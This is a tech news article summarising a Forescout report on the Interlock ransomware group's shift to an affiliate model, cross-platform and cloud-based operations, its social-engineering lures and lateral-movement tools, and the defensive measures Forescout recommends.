- Interlock ransomware has reached operational maturity and is now targeting the healthcare, government, and manufacturing industries.
- It supports cross-platform attacks, cloud-based C2, and full lifecycle automation.
- Forescout recommends early detection, behavioral analysis and access controls to reduce risk
Interlock ransomware is no longer a mid-level credential stealer. It is now a highly sophisticated, cloud-based, cross-platform ransomware company with its own subsidiaries, automations, and professionalized operations.
That’s according to a new report from security researchers Forescout, who have been tracking Interlock since its inception in mid-2024.
In the report, Forescout states that Interlock entered “operational maturity” (phase 3) in February 2025, becoming capable of attacking high-value targets in sectors such as healthcare, government and manufacturing.
Operational maturity stage
At the operational maturity stage, Interlock began operating as a commercial platform, allowing affiliated companies or partner groups to carry out attacks under its name. It also incorporates a complete attack lifecycle, no longer relying on fragmented or experimental methods. Everything from initial access and lateral movement to data encryption and exfiltration can be done through Interlock.
The ransomware has expanded to target not only Windows, but also Linux, BSD, and VMware ESXi servers, and now uses legitimate cloud services for command and control (C2) and data exfiltration, including Cloudflare tunnels and Azure’s AzCopy utility.
It moved from fake update pages to impersonating enterprise software like FortiClient or Cisco AnyConnect, and adopted new social engineering lures like ClickFix and FileFix. Managers purchased credentials from the initial access brokers, gaining them immediate privileged access. They then used tools such as Cobalt Strike, SystemBC, Putty, PsExec and Posh-SSH to move laterally and control systems across networks.
The malware platform has also improved its persistence and stealth, and now leverages the cloud for data theft. Its ransom demands have become more professional, and other communications now sound more like corporate “incident alerts,” Forescout added. From now on, the emphasis is on the effectiveness of negotiations:
“The tone of communication is characteristic of enterprise-focused ransomware operations, with emphasis on it being a ‘security alert’ rather than a disruption, although messages emphasize the consequences of non-payment, including legal liability for exposure of customer data and regulatory sanctions under GDPR, HIPAA or other frameworks,” the report notes.
To defend against Interlock, Forescout recommends focusing on early detection of ransomware behavior and reducing the attack surface. This includes using risk-based conditional access policies, implementing behavioral analysis, monitoring PowerShell activity, looking for anomalies in authentication logs, and monitoring for signs of lateral movement.
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
